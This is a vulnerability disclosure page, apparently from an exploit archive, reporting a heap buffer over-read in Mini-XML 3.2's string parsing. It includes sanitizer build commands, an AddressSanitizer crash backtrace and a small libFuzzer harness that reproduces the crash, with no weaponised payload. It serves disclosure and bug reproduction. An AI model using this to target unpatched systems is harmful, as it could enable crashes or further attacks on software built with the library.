Mini-XML 3.2 Heap Overflow

2021.10.29
Credit: LIWEI
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-119

# Exploit Title: Mini-XML 3.2 - Heap Overflow # Google Dork: mxml Mini-xml Mini-XML # Date: 2020.10.19 # Exploit Author: LIWEI # Vendor Homepage: https://www.msweet.org/mxml/ # Software Link: https://github.com/michaelrsweet/mxml # Version: v3.2 # Tested on: ubuntu 18.04.2 # 1.- compile the Mini-XML code to a library use compile line"clang -g -O0 -fno-omit-frame-pointer -gline-tables-only -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link". # 2.- compile my testcase and link them to a binary use compile line "clang -g -O0 -fno-omit-frame-pointer -gline-tables-only -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer". In my testcase, I use the API "mxmlLoadString" to parse a string. # 3.- run the binary for a short time.crash. because the "mxml_string_getc" didn't versify the string's length and cause buffer-overflow. # 4.- Here are the crash backtrace. ================================================================= ==6265==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000000a73 at pc 0x000000558e2d bp 0x7ffe13e2caa0 sp 0x7ffe13e2ca98 READ of size 1 at 0x612000000a73 thread T0 #0 in mxml_string_getc /opt/mnt/software/mxml32/mxml-file.c:2422:13 #1 in mxml_load_data /opt/mnt/software/mxml32/mxml-file.c:1558:20 #2 in mxmlLoadString /opt/mnt/software/mxml32/mxml-file.c:180:11 #3 in LLVMFuzzerTestOneInput /opt/mnt/software/mxml32/mxml_fuzzer.cpp:12:8 #4 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x42f357) #5 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x41f7ea) #6 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/opt/mnt/software/mxml32/a.out+0x42a7b0) #7 in main (/opt/mnt/software/mxml32/a.out+0x41d4b2) #8 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310 #9 in _start (/opt/mnt/software/mxml32/a.out+0x41d529) # 6.- Here are my testcase. #include <string> #include <vector> #include <assert.h> #include "mxml.h" extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { std::string c(reinterpret_cast<const char *>(data), size); char *ptr; mxml_node_t *tree; tree = mxmlLoadString(NULL, c.c_str(), MXML_NO_CALLBACK); if(tree){ ptr = mxmlSaveAllocString(tree, MXML_NO_CALLBACK); if(!ptr) assert(false); mxmlDelete(tree); } return 0; }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top